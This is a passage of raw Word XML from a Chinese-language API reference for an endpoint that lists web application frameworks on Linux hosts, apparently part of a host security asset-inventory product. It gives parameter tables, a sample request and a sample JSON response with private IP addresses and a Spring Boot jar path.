              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4730C722" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35544416" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="67FB3071" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2402D34A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B70884A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47294085" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="149D0CA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3B6E5D6B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A7E4DB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A78708C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0982897F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FE1906B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="37A45F8A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1402B827" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="475F6152" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="312566A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02DEC7D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>web应用框架名称（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6DBD01B6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37F1F6F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="589C5DA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01C206DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B8E50C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>web应用框架版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F8BB6BF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06F78EC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="622D59F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00E0FAE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52061CCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>框架语言</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="31A636F9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DEE8D43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03AE0EF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="478017F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1823D4C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>服务类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5097CB25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A59185D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/webframe/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7708A463" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21976CCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "Apache Commons CLI\r (wisteria.jar)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version": "1.4",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "type": "java",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "serverName": "Spring Boot",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "domainName": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "webAppDir": "/data/app/titan-wisteria/upload/wisteria-3.0.4-oldtcm_180320145655/wisteria.jar",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493560EB"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520"/>
        <w:gridCol w:w="1058"/>
        <w:gridCol w:w="5339"/>
        <w:gridCol w:w="2165"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4AD921A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FD3E18D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E80B152" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A1F5B20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FF7A747" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="15333CAF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06ED4C8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="589E963C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56F673E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47C96BA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="61D52573" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69ABD1B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F98AED8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F78871D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DE413B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="780B5F7A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="490AA231" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37FCFD7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F951CB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="167A974F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="18086F2F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="675ACAD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2124C6AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AE64DD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1043E72D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="358CE06C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="169E1CA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ABD8CC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64CDA566" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="404F195D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0CE31EA6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="788A6EB1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71C565DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CE219AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48FF8020" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0ED926DC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="001B83AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A972E42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54D66C79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="410C45A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="725517D0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BB47DD2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="164BA819" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F7C9382" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1933C68F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="09DB2ED8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="457F8BC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4922765C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A23872E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5005CECB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6A13D1D3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38A0D9EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DD5418D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="494079A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="498763FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="584D57F0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15658198" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
